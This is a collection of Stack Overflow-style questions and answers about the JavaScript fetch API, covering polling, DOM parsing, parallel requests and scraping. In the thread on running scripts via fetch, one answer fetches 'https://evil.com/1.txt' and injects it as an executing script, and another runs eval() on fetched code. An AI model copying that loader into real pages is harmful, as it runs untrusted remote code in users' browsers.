How to fetch, wait 5 seconds, and get the source code of a page - JavaScript

I have two websites; the first gets the source code of the second (the two sites are not on the same host, hence CORS). The second website is not mine.
Example:
fetch("https://api.allorigins.win/get?url=" + url)
.then(response => {
if (response.ok) {
return response.json();
}
throw new Error('Network response was not ok.');
})
.then(data => {
var html = stringToHTML(data.contents);
});
It works, except that the second page renders some of its elements several seconds after it first loads, and those elements are missing for me because I retrieved the page too early.
How can I make it wait a few seconds before grabbing the page, while still going through "api.allorigins.win"?
Do you have an idea? (I use vanilla JS)

It's allorigins that would have to wait for the rendering, but it does not.
Your alternative is to implement your own version of allorigins using a headless browser that waits for the page to render before returning its HTML. There's no ready-made solution for it.
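For what it's worth, here's a minimal sketch of that idea: a tiny proxy endpoint built on Puppeteer. The endpoint shape mirrors allorigins, but the port, the route, and the networkidle0 wait are all assumptions, not a drop-in replacement:
// Sketch of a self-hosted "allorigins" that waits for client-side rendering.
// Assumes Node.js with `express` and `puppeteer` installed.
const express = require('express');
const puppeteer = require('puppeteer');

const app = express();

// GET /get?url=... -> { contents: "<rendered html>" }
app.get('/get', async (req, res) => {
    const browser = await puppeteer.launch();
    const page = await browser.newPage();
    // networkidle0 resolves once the page has stopped making requests,
    // so late-rendered elements are included in the snapshot
    await page.goto(req.query.url, { waitUntil: 'networkidle0' });
    const html = await page.content();
    await browser.close();
    res.json({ contents: html });
});

app.listen(3000);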

I don't know if you're using a framework or any library to handle the DOM, but with vanilla JS you can do something like this to check whether your DOM element is ready:
const DOMReadyCheck = setInterval(() => {
    if (document.querySelector('#your-element')) { // hypothetical selector - get your element here
        // send your fetch request and set your element with data
        clearInterval(DOMReadyCheck);
    }
}, 100); // re-check every 100 ms

Related

Refresh/retrigger "fetch" in HTML/JavaScript

First things first: I don't know anything about coding; I basically built my whole HTML file by CMD+C and CMD+V of what I found through lots of Google searches, changing just what was needed so it fits what I intended. Interestingly, I got a result that is 95% what I wanted.
Now I have just one last thing I can't set (or find about on Google), so hopefully someone can answer it here. [Trying to put in as much information as I can]
I made a simple one page HTML that shows the date/time and plays an audio livestream from my PC when opened.
I also want it to display the "Now Playing" information. After a lot of searches, I finally found a solution that even I could make with Dreamweaver.
I used the "fetch script" (or is it called Fetch APP?) to get a txt file that my music player gives as output with the current song information. That fetch script get the data and put it into a
The problem is that is only seems to do it once at page load and not every few seconds. The contents in the txt change whenever a new song plays and I want the displayed data on the HTML to stay current as well.
So how do I set that fetch script to re-fetch the txt contents every ~10 seconds?
Here is my current fetch script:
<script>
var url = 'NowPlaying.txt';
var storedText;

fetch(url)
    .then(function(response) {
        response.text().then(function(text) {
            storedText = text;
            currentSong();
        });
    });

function currentSong() {
    document.getElementById('thesong').textContent = storedText;
}
</script>
For making my HTML I use "Dreamweaver 2019" on "Mac OS 11 Big Sur"
It's a single HTML file, and all the files/assets the HTML accesses (the audio, background images and the txt file) are in the same directory/network.
I hope that provides all necessary details.
Oh, and what I already tried is copying the line "var t = setTimeout(fetch, 100);" into the script, because this seems to be what keeps the clock JavaScript current, and I hoped it would do the same with fetch.
Also attached is a screenshot of the HTML "live" in Chrome >> screenshot
As you can see, the bottom is supposed to show the "Now Playing" information (please ignore that the text is cut off at the right in this example; the current information is too long).
You can simply use setInterval to call your fetch every 10 seconds.
Just wrap your fetch in a function and call that function with setInterval.
Also, if at some point you would like to stop the fetch requests on an event such as a button click, you can use clearInterval to stop them without refreshing the page (see the sketch after the snippet).
Run the snippet below to see the function getting called every 10 seconds.
var url = 'NowPlaying.txt';
var storedText;

// Fetch every 10 seconds
function fetch10Seconds() {
    fetch(url)
        .then(function(response) {
            response.text().then(function(text) {
                storedText = text;
                currentSong();
            });
        });
    console.log('Fetch again in 10 seconds');
}

// Call the function every 10 seconds (the interval is given in milliseconds)
setInterval(fetch10Seconds, 10000);

// Called on each fetch
function currentSong() {
    document.getElementById('thesong').textContent = storedText;
}
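And to stop the polling later without refreshing the page, keep the id that setInterval returns and clear it, for example from a hypothetical Stop button:
// Keep the interval id so the polling can be cancelled later
var intervalId = setInterval(fetch10Seconds, 10000);

// Hypothetical button with id="stop-updates"
document.getElementById('stop-updates').addEventListener('click', function() {
    clearInterval(intervalId); // no more fetches until the page is reloaded
});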
You can create a loop using the setInterval function:
var url = 'NowPlaying.txt';
var storedText;

setInterval(() => {
    fetch(url)
        .then(function(response) {
            response.text().then(function(text) {
                storedText = text;
                currentSong();
            });
        });
}, 10000); // in milliseconds

function currentSong() {
    document.getElementById('thesong').textContent = storedText;
}
Try this:
function doFetch() {
    setTimeout(() => {
        fetch(url)
            .then(response => {
                response.text().then(text => {
                    storedText = text;
                    currentSong();
                    doFetch();
                });
            });
    }, 10000);
}
doFetch();
This waits for the data to be fetched before waiting another 10 seconds and fetching again. setInterval, by contrast, fires every 10 seconds on the dot, regardless of whether the last run of the function succeeded.
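The same recursive-delay pattern can also be written with async/await; this is just an equivalent sketch reusing url, storedText and currentSong from the question:
async function pollSong() {
    while (true) {
        // wait 10 seconds, measured from the end of the previous fetch
        await new Promise(resolve => setTimeout(resolve, 10000));
        const response = await fetch(url);
        storedText = await response.text();
        currentSong();
    }
}
pollSong();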

Using jQuery on ajax response triggers additional network requests

I am writing a small script that takes a bunch of links from a page, fetches them and scours the results for some data.
E.g. like this:
let listLinks = $('.item a');
listLinks.each(function() {
    let url = this.href;
    fetch(url, {
        credentials: 'include'
    })
        .then(response => response.text())
        .then(function(html) {
            let name = $('#title h1', html);
        });
});
My problem is that once we run the selector on the response, the network tab in my browser's dev tools lights up with requests for a ton of resources, as if something (jQuery?) is just loading the entire page!
What the hell is going on here?
I don't want to load the entire page (resources and all), I just want to take a bunch of text from the HTML response!
Edit: After some more scrutiny, I discovered it only makes network requests for the images on the ajaxed page, but not for scripts or stylesheets.
It does not make these requests if I try to process the html in another way, say, by calling .indexOf() on it. Only if I traverse it via jQuery.
Edit 2: Poking around in dev tools, the network tab has an "initiator" column. It says this is the initiator of the requests: github code. I don't know what to make of that, however...
P.S. Inb4 "just regex it".
I've discovered the cause:
My code above(relevant line):
$('#title h1', html)
is equivalent to
$(html).find('#title h1')
And $(html) essentially creates DOM elements. Actual, literal DOM objects.
When you create an <img> element (which the HTML I parse contains), the browser automatically issues a network request.
Relevant StackOverflow question:
Set img src without issuing a request
With the code in the question the created DOM elements are still associated with the current document(as noted here), therefore the browser automatically makes a request for new <img>s it doesn't have yet.
The correct solution is to create a separate document, e.g.
let parser = new DOMParser();
let doc = parser.parseFromString(html, "text/html");
let name = $('#title h1', doc);
No network requests go out in this case.
JSFiddle
The problem is that you are using fetch. Use jQuery.ajax:
$.ajax({
    url: 'URL',
    type: 'GET',
    dataType: 'html',
    success: function(responseHTML) {
        console.log(responseHTML);
    }
});

Can I run a JS script from another using `fetch`?

Lower intermediate JS/JQ person here.
I'm trying to escape callback hell by using JS fetch. This is billed as "the replacement for AJAX" and seems to be pretty powerful. I can see how you can get HTML and JSON objects with it... but is it capable of running another JS script from the one you're in? Maybe there's another new function in ES6 to do:
$.getScript( 'xxx.js' );
i.e.
$.ajax({ url : 'xxx.js', dataType : "script", });
...?
Later, in response to Joseph The Dreamer:
Tried this:
const createdScript = $(document.createElement('script')).attr('src', 'generic.js');
fetch( createdScript )...
... it didn't run the script "generic.js". Did you mean something else?
The Fetch API is supposed to provide a promise-based API for fetching remote data. Loading a random remote script is not AJAX, even if jQuery.ajax is capable of that, so it won't be handled by the Fetch API.
A script can be appended dynamically and wrapped with a promise:
const scriptPromise = new Promise((resolve, reject) => {
    const script = document.createElement('script');
    script.onload = resolve;
    script.onerror = reject;
    script.async = true;
    script.src = 'foo.js';
    document.body.appendChild(script);
});

scriptPromise.then(() => { ... });
SystemJS is supposed to provide promise-based API for script loading and can be used as well:
System.config({
    meta: {
        '*': { format: 'global' }
    }
});

System.import('foo.js').then(() => { ... });
There are a few things to mention here.
Yes, it is possible to execute JavaScript just loaded from the server. You can fetch the file as text and use eval(...), though this is not recommended because of untraceable side effects and a lack of security!
Another option would be:
1. Load the JavaScript file
2. Create a script tag with the file contents (or its URL, since the browser caches the file)
This works, but it may not free you from callback hell per se. A sketch of this option follows.
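A minimal sketch of option 2, assuming xxx.js is same-origin or readable via CORS:
fetch('xxx.js')
    .then(response => response.text())
    .then(code => {
        // Inline the fetched source in a new script tag;
        // it executes as soon as the tag is inserted
        const script = document.createElement('script');
        script.textContent = code;
        document.body.appendChild(script);
    });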
If what you want is to load other JavaScript files dynamically you can use, for example, requirejs; you can define modules and load them dynamically. Take a look at http://requirejs.org/
If you really want to get out of callback hell, what you need to do is:
Define functions (you can have them in the same file or load them from another file using requirejs on the client, or webpack if you can afford a compilation step before deployment)
Use promises or streams if needed (see RxJS https://github.com/Reactive-Extensions/RxJS)
Remember that promise.then returns a promise:
someAsyncThing()
    .then(doSomethingAndResolveAnotherAsyncThing)
    .then(doSomethingAsyncAgain)
Remember that promises can be composed (note that Promise.all takes an array):
Promise.all([somePromise, anotherPromise, fetchFromServer])
    .then(doSomethingWhenAllOfThoseAreResolved)
Yes, you can:
<script>
fetch('https://evil.com/1.txt').then(function(response) {
    if (!response.ok) {
        return false;
    }
    return response.blob();
}).then(function(myBlob) {
    var objectURL = URL.createObjectURL(myBlob);
    var sc = document.createElement("script");
    sc.setAttribute("src", objectURL);
    sc.setAttribute("type", "text/javascript");
    document.head.appendChild(sc);
});
</script>
Don't listen to the selected "right" answer.
The following fetch() API code works perfectly well for me, as proposed in the answer by @cnexans (fetching as .text() and then eval()). I noticed increased performance compared to the method of adding the <script> tag.
Run the code snippet to see the fetch() API loading asynchronously (as it is a Promise):
// Loading moment.min.js as a sample script
// only use eval() for sites you trust
fetch('https://momentjs.com/downloads/moment.min.js')
    .then(response => response.text())
    .then(txt => eval(txt))
    .then(() => {
        document.getElementById('status').innerHTML = 'moment.min.js loaded';
        // now you can use the script
        document.getElementById('today').innerHTML = moment().format('dddd');
        document.getElementById('today').style.color = 'green';
    })

#today {
    color: orange;
}

<div id='status'>loading 'moment.min.js' ...</div>
<br>
<div id='today'>please wait ...</div>
The Fetch API provides an interface for fetching resources (including across the network). It will seem familiar to anyone who has used XMLHttpRequest, but the new API provides a more powerful and flexible feature set. https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API
That's what it's supposed to do, but unfortunately it doesn't evaluate the script.
That's why I released this tiny Fetch data loader on Github.
It loads the fetched content into a target container and runs its scripts (without using the evil eval() function).
A demo is available here: https://www.ajax-fetch-data-loader.miglisoft.com
Here's a sample code:
<script>
document.addEventListener('DOMContentLoaded', function(event) {
    fetch('ajax-content.php')
        .then(function(response) {
            return response.text();
        })
        .then(function(html) {
            console.info('content has been fetched from data.html');
            loadData(html, '#ajax-target').then(function(html) {
                console.info('I\'m a callback');
            });
        }).catch((error) => {
            console.log(error);
        });
});
</script>

Multiple web service calls from chrome extension

I'm writing my first JavaScript Chrome Extension using JQuery 2.2.0, which basically takes the current URL and polls a few different web services to see if they have a record of the URL. If it exists, I add a text link in the DOM. Here's a simplified working version:
// Does the provided URL exist?
function url_exists(url) {
    var h = new XMLHttpRequest();
    h.open('HEAD', url, false);
    h.send();
    return h.status != 404;
}

// Display a link to the database record URL in the DOM
function display_database_link(url) {
    $('body').prepend('Link');
}

// Get the current URL
var url = window.location.href;
var database_number = 0;

// See if this URL exists in one of our databases via the API
// Does the URL exist in database 1?
if (url_exists("https://api.database1.com/urls/" + url)) {
    database_number = 1;
}
// Does the URL exist in database 2?
else if (url_exists("https://api.database2.com/urls/" + url)) {
    database_number = 2;
}

if (database_number > 0) {
    display_database_link("https://api.database" + database_number + ".com/urls/" + url);
}
What I have works, but I'm wondering if:
there's a way to make multiple calls to url_exists at once, and
if there's a way to do this asynchronously.
If someone could respond with a link to relevant documentation or examples, I'd really appreciate it!
There are a couple of awesome modern features that will make this nice and easy: fetch and ES2015 promises. You'll have to do some tweaking, but something like this should work.
// Array of API endpoints to make requests to
let url = window.location.href;
let database_urls = ["https://api.database1.com/urls/", "https://api.database2.com/urls/"];

// Promise.all will take an array of promises and perform all of them, and `then` process all results at the end
Promise.all(database_urls.map(database_url =>
    // Make an HTTP request to the endpoint, and `then` get the status code from the response
    fetch(database_url + url).then(response => response.status)
// Once `all` promises are resolved, `then` iterate over the resulting statuses
)).then(statuses => {
    // Reduce `statuses` to a count of how many are not 404s
    let existCount = statuses.reduce((prev, curr) => {return curr == 404 ? prev : prev + 1}, 0);
    // Call a method to display the link if existCount is > 0
});
Yes, you can make all of them at once; the browser will execute them at once, but the results will take different amounts of time to reach you.
You have h.open('HEAD', url, false); the third parameter (false) defines whether the request is asynchronous or synchronous. It should be set to true: http://www.w3schools.com/ajax/ajax_xmlhttprequest_send.asp
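An asynchronous rewrite of the question's url_exists would then deliver its result through a callback; a sketch:
// Asynchronous version of url_exists from the question
function url_exists(url, callback) {
    var h = new XMLHttpRequest();
    h.open('HEAD', url, true); // true = asynchronous
    h.onload = function() {
        callback(h.status != 404);
    };
    h.send();
}

// Usage: the check no longer blocks the page
url_exists("https://api.database1.com/urls/" + url, function(exists) {
    if (exists) {
        display_database_link("https://api.database1.com/urls/" + url);
    }
});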
Since you have jQuery, why not use the Ajax function? http://api.jquery.com/jquery.ajax/
Be careful: if your extension makes 1000 requests to 1000 databases it will slow down the user's browser/internet.
These requests take some amount of time until you get a response back, so don't immediately check whether database_number is greater than 0.

node.js request a webpage with async scripts

I'm downloading a webpage using the request module, which is very straightforward.
My problem is that the page I'm trying to download has some async scripts (they have the async attribute), and they're not downloaded with the HTML document returned by the HTTP request.
My question is how I can make an HTTP request, preferably (but not necessarily) with the request module, and have the WHOLE page download without gaps like the one described above.
Sounds like you are trying to do web scraping using JavaScript.
Using request is a very fundamental approach which may be too low-level and time-consuming for your needs. The topic is pretty broad, but you should look into more purpose-built modules such as cheerio, x-ray and nightmare.
x-ray will let you select elements directly from the page in a jQuery-like way instead of parsing the whole body.
nightmare provides a modern headless browser which makes it possible for you to enter input as though using the browser manually. With this you should be able to better handle the ajax-type requests which are causing you problems (see the sketch below).
HTH and good luck!
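For instance, a minimal nightmare sketch (assumes npm install nightmare; the URL is a placeholder and the 2000 ms wait is an arbitrary stand-in for however long the async scripts need):
const Nightmare = require('nightmare');
const nightmare = Nightmare();

nightmare
    .goto('http://example.com') // placeholder URL
    .wait(2000)                 // give async scripts time to run
    .evaluate(() => document.documentElement.outerHTML)
    .end()
    .then(html => console.log(html))
    .catch(err => console.error(err));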
Using only request you could try the following approach to pull the async scripts.
Note: I have tested this with a very basic setup and there is work to be done to make it robust. However, it worked for me:
Test setup
To set up the test I created an HTML file which includes a script in the body like this: <script src="abc.js" async></script>
Then I created a temporary server to launch it (httpster).
Scraper
"use strict";
const request = require('request');
const options1 = { url: 'http://localhost:3333/' }
// hard coded script name for test purposes
const options2 = { url: 'http://localhost:3333/abc.js' }
let htmlData // store html page here
request.get(options1)
.on('response', resp => resp.on('data', d => htmlData += d))
.on('end', () => {
let scripts; // store scripts here
// htmlData contains webpage
// Use xml parser to find all script tags with async tags
// and their base urls
// NOT DONE FOR THIS EXAMPLE
request.get(options2)
.on('response', resp => resp.on('data', d => scripts += d))
.on('end', () => {
let allData = htmlData.toString() + scripts.toString();
console.log(allData);
})
.on('error', err => console.log(err))
})
.on('error', err => console.log(err))
This basic example works. You will need to find all the js scripts on the page and extract the URL part, which I have not done here; a sketch of that step follows.
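The missing extraction step could look something like this with cheerio (an assumption on my part; any HTML parser would do):
const cheerio = require('cheerio');

// Parse the fetched page and collect the src of every async script tag
const $ = cheerio.load(htmlData.toString());
const scriptUrls = $('script[async]')
    .map((i, el) => $(el).attr('src'))
    .get(); // e.g. ['abc.js'] for the test page above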
